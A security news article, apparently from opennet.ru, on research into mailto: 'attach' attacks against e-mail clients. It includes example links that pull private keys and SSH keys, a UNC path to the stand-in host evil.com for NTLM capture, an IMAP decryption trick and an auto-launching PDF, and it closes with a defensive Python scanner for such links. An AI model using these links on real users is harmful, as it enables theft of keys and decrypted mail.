Attacking e-mail client users through "mailto:" links

Researchers from Ruhr University Bochum (Germany) analysed (PDF) how mail clients behave when handling "mailto:" links that carry extended parameters. Five of the twenty e-mail clients tested were vulnerable to an attack that abuses resource substitution through the "attach" parameter. Another six clients were vulnerable to PGP and S/MIME key-replacement attacks, and three clients were vulnerable to an attack that extracts the plaintext of encrypted messages.

"mailto:" links are used to automatically open the mail client to compose a message to the addressee named in the link. Besides the address, the link can carry extra parameters, such as the subject line and a template for the message body. The proposed attack manipulates the "attach" parameter, which lets an attachment be added to the message being composed. Note that the mailto: URI specification (RFC 6068) defines no "attach" field: it is a client-specific extension, which is why its handling varies so much between clients.

The Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail clients were vulnerable to a trivial attack that automatically attaches any local file named in a link of the form "mailto:?attach=path_to_file". The file is attached without any warning, so unless the user looks carefully at the compose window, they may not notice that the message is about to be sent with an attachment.

For example, a link like "mailto:<address>?subject=Title&body=Text&attach=~/.gnupg/secring.gpg" inserts the user's GnuPG private keyring into the message (secring.gpg is the GnuPG 1.x/2.0 layout; GnuPG 2.1 and later keep private keys under ~/.gnupg/private-keys-v1.d/, which can be targeted the same way). Cryptocurrency wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other file readable by the user can be exfiltrated the same way. Moreover, Thunderbird allows whole groups of files to be attached by wildcard, using constructs such as "attach=/tmp/*.txt".

Besides local files, some mail clients also resolve links to network shares and to paths on the IMAP server. In particular, IBM Notes attaches a file from a network share when processing links such as "attach=\\evil.com\dummyfile"; pointing the link at an SMB server controlled by the attacker therefore also lets the attacker capture NTLM authentication material, because the request is sent with the user's current authentication credentials.

Thunderbird successfully processes requests of the form "attach=imap:///fetch>UID>/INBOX>1/", which attach content taken from folders on the user's IMAP server. Worse, messages fetched from IMAP that are encrypted with OpenPGP or S/MIME are decrypted automatically by the mail client before they are sent, so the attacker receives plaintext. Thunderbird developers were notified of the problem in February, and it is already fixed in Thunderbird 78 (the Thunderbird 52, 60 and 68 branches remain vulnerable).

Older Thunderbird releases are also vulnerable to two other variants of the PGP and S/MIME attacks proposed by the researchers. Specifically, Thunderbird, along with Outlook, PostBox, eM Client, MailMate and R2Mail2, was susceptible to a key-replacement attack caused by the mail client automatically importing and installing new certificates delivered in S/MIME messages, which lets an attacker replace public keys the user has already stored.

The second attack, which affects Thunderbird, PostBox and MailMate, abuses the automatic draft-saving mechanism: using mailto parameters it can trigger decryption of encrypted messages, or the addition of a digital signature to arbitrary messages, with the result then uploaded to an IMAP server controlled by the attacker. In this attack the ciphertext is passed through the "body" parameter, and a "meta refresh" tag is used to initiate the request to the attacker's IMAP server. Example: ' '

To have "mailto:" links processed automatically without any user interaction, specially crafted PDF documents can be used: a PDF's OpenAction launches the mailto handler as soon as the document is opened:

%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...]) >>
endobj

trailer
<< /Root 1 0 R >>
%%EOF
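The following is an added example, not code from the paper, from opennet.ru or from any of the mail clients discussed. It shows the check a client or a mail-security gateway would want to perform: parse a mailto: URL into its RFC 6068 parts, flag the non-standard "attach" parameter and the dangerous value shapes described above (local paths, wildcards, UNC paths, imap: URLs, PGP ciphertext in the body), and pull the URI out of a PDF's /OpenAction so the same check can be run on a document like the one above. The sample PDF, the function names and the wording of the findings are the example's own constructions.

```python
"""Flag dangerous mailto: links, including ones auto-launched from a PDF OpenAction (added example)."""
import re
from urllib.parse import unquote

# Header fields a mailto: URL is expected to carry (RFC 6068 and common client practice).
# Anything else, notably "attach", is a client-specific extension.
SAFE_HFIELDS = {"to", "cc", "bcc", "subject", "body", "in-reply-to"}


def parse_mailto(url):
    """Split a mailto: URL into (recipients, [(hfield_name, value), ...]) per RFC 6068 syntax."""
    if not url.lower().startswith("mailto:"):
        raise ValueError("not a mailto: URL")
    addr_part, _, query = url[len("mailto:"):].partition("?")
    recipients = [unquote(a) for a in addr_part.split(",") if a]
    hfields = []
    if query:
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            hfields.append((unquote(name).lower(), unquote(value)))
    return recipients, hfields


def classify_mailto(url):
    """Return a list of human-readable findings; an empty list means the link looks benign."""
    findings = []
    _, hfields = parse_mailto(url)
    for name, value in hfields:
        if name in ("attach", "attachment"):
            findings.append(f"attachment parameter '{name}' -> {value}")
            if re.match(r"^\\\\|^//", value):
                findings.append("UNC path: may trigger outbound SMB/NTLM authentication")
            elif value.lower().startswith("imap:"):
                findings.append("IMAP URL: may attach (and decrypt) mail from the user's own server")
            elif "*" in value or "?" in value:
                findings.append("wildcard: may attach a whole group of files")
        elif name not in SAFE_HFIELDS:
            findings.append(f"non-standard hfield '{name}'")
        elif name == "body" and "-----BEGIN PGP MESSAGE-----" in value:
            findings.append("body carries PGP ciphertext: possible decryption-oracle attack")
    return findings


# Minimal PDF object scanning. Enough for flat documents like the one on the page;
# it does not handle nested dictionaries, escaped parentheses or compressed object streams.
OBJ = re.compile(rb"(\d+)\s+0\s+obj(.*?)endobj", re.S)
OPENACTION_REF = re.compile(rb"/OpenAction\s*\[?\s*(\d+)\s+0\s+R")
OPENACTION_DIRECT = re.compile(rb"/OpenAction\s*<<(.*?)>>", re.S)
URI_ACTION = re.compile(rb"/S\s*/URI\b.*?/URI\s*\((.*?)\)", re.S)


def openaction_uris(pdf_bytes):
    """Return the URI strings a PDF launches automatically via /OpenAction (direct or by reference)."""
    objects = {int(m.group(1)): m.group(2) for m in OBJ.finditer(pdf_bytes)}
    targets = [objects.get(int(m.group(1)), b"") for m in OPENACTION_REF.finditer(pdf_bytes)]
    targets += [m.group(1) for m in OPENACTION_DIRECT.finditer(pdf_bytes)]
    return [u.group(1).decode("latin-1") for t in targets for u in URI_ACTION.finditer(t)]


def scan_pdf(pdf_bytes):
    """Map every mailto: URI auto-launched by the PDF to its findings."""
    return {uri: classify_mailto(uri)
            for uri in openaction_uris(pdf_bytes) if uri.lower().startswith("mailto:")}


# Constructed sample modelled on the page's PDF, with the IMAP attach trick added to the URI.
SAMPLE_PDF = b"""%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...]&attach=imap:///fetch>UID>/INBOX>1/) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for link in ("mailto:alice@example.com?subject=Hi",
                 "mailto:?subject=Title&body=Text&attach=~/.gnupg/secring.gpg",
                 "mailto:?attach=\\\\evil.com\\dummyfile",
                 "mailto:?attach=/tmp/*.txt"):
        print(link, "->", classify_mailto(link) or "benign")
    for uri, findings in scan_pdf(SAMPLE_PDF).items():
        print("PDF OpenAction:", uri)
        for f in findings:
            print("   ", f)
```

A client-side fix follows the same logic in reverse: accept only the fields in SAFE_HFIELDS, drop everything else, and always show the attachment list to the user before sending, which is also the behaviour the fixed Thunderbird 78 adopts for the "attach" parameter.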


source: opennet.ru
